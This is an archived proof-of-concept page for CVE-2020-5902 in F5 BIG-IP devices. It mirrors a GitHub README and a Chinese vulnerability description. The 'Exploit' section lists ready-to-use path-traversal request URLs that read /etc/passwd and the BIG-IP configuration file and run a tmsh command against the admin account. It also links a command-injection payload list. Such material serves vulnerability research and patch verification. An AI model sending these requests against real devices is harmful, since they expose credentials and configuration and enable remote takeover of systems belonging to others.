Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-5902 PoC — F5 BIG-IP 路径遍历漏洞

Source
https://github.com/JSec1337/RCE-CVE-2020-5902
Associated Vulnerability
Title:F5 BIG-IP 路径遍历漏洞 (CVE-2020-5902)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP中存在路径遍历漏洞。攻击者可利用该漏洞执行任意的系统命令、创建或删除文件,关闭服务/执行任意的Java代码,可能完全入侵系统。以下产品及版本受到影响:F5 BIG-IP 15.1.0版本,15.0.0版本,14.1.0版本至14.1.2版本,13.1.0版本至13.1.3版本,12.1.0版本至12.1.5版本,11.6.1版本至11.6.5版本。
Description
BIG-IP F5 Remote Code Execution
Readme
# RCE-CVE-2020-5902
BIG-IP F5 Remote Code Execution

# Description

These attacks are targeting BIG-IP, a multi-purpose networking device manufactured by F5 Networks. BIG-IP devices can be configured to work as traffic shaping systems, load balancers, firewalls, access gateways, rate limiters, or SSL middleware.

On Wednesday, F5 Networks published patches and released a security advisory about a "remote code execution" vulnerability in BIG-IP devices.

F5 said the vulnerability, tracked as CVE-2020-5902, could allow attackers to take full control over unpatched systems that are accessible on the internet.

```bash
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10
```

# Exploit 

```bash
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
```bash
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```
```bash
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
# NMAP Check

<img src="https://pbs.twimg.com/media/EcLphgrXQAIiiN8?format=png&name=4096x4096" alt="" aria-label="nse" src="" width=“50” height=“50”>

# Payload RCE 

https://github.com/payloadbox/command-injection-payload-list
 
# Reference 

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/
File Snapshot

 [4.0K]  /data/pocs/4c0d9a18e10dda44674f3b085c00ab6e9636186b
├── [4.1K]  http-vuln-cve2020-5902.nse
└── [1.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.